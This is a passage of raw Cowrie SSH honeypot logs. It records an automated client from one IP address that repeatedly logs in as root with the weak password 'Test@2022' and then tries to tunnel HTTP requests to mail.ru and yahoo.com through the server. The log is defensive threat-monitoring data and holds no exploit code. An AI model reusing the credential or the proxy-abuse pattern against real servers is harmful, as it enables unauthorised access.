{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.001807Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22947,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22947","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.144372Z","session":"2ee6bd815d57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.194386Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":7257,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7257","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.336555Z","session":"2ee6bd815d57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.387165Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.438055Z","src_ip":"77.83.207.83","session":"2ee6bd815d57"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58634,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a119f481623","protocol":"ssh","message":"New connection: 77.83.207.83:58634 (1.2.3.4:22) [session: 4a119f481623]","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.487362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.497225Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.538155Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.789669Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27825,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27825","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.841227Z","session":"4a119f481623"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:59.891750Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7049,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7049","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.036687Z","session":"4a119f481623"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.087218Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":17258,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17258","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.228987Z","session":"4a119f481623"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.279552Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.330900Z","src_ip":"77.83.207.83","session":"4a119f481623"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58707,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4c7479f7311","protocol":"ssh","message":"New connection: 77.83.207.83:58707 (1.2.3.4:22) [session: e4c7479f7311]","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.379211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.380164Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.430199Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.679215Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19324,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19324","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.731875Z","session":"e4c7479f7311"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.781882Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12059,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12059","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.924454Z","session":"e4c7479f7311"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:00.974455Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":5908,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5908","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.116127Z","session":"e4c7479f7311"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.166118Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.216896Z","src_ip":"77.83.207.83","session":"e4c7479f7311"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58780,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cf9c0845670","protocol":"ssh","message":"New connection: 77.83.207.83:58780 (1.2.3.4:22) [session: 3cf9c0845670]","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.269107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.270319Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.323012Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.586432Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31191,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31191","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.640255Z","session":"3cf9c0845670"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.693106Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25114,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25114","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.839139Z","session":"3cf9c0845670"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:01.892160Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":14281,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14281","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.039194Z","session":"3cf9c0845670"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.092541Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.146362Z","src_ip":"77.83.207.83","session":"3cf9c0845670"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58894,"dst_ip":"1.2.3.4","dst_port":22,"session":"79699f7940eb","protocol":"ssh","message":"New connection: 77.83.207.83:58894 (1.2.3.4:22) [session: 79699f7940eb]","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.195520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.204459Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.245800Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.495236Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1329,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1329","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.547117Z","session":"79699f7940eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.597461Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":17096,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:17096","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.740546Z","session":"79699f7940eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.790876Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":17928,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17928","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.932490Z","session":"79699f7940eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:02.982806Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.034339Z","src_ip":"77.83.207.83","session":"79699f7940eb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":58988,"dst_ip":"1.2.3.4","dst_port":22,"session":"66847a063daa","protocol":"ssh","message":"New connection: 77.83.207.83:58988 (1.2.3.4:22) [session: 66847a063daa]","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.084642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:03.095065Z","src_ip":"77.83.207.83","session":"66847a063daa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","h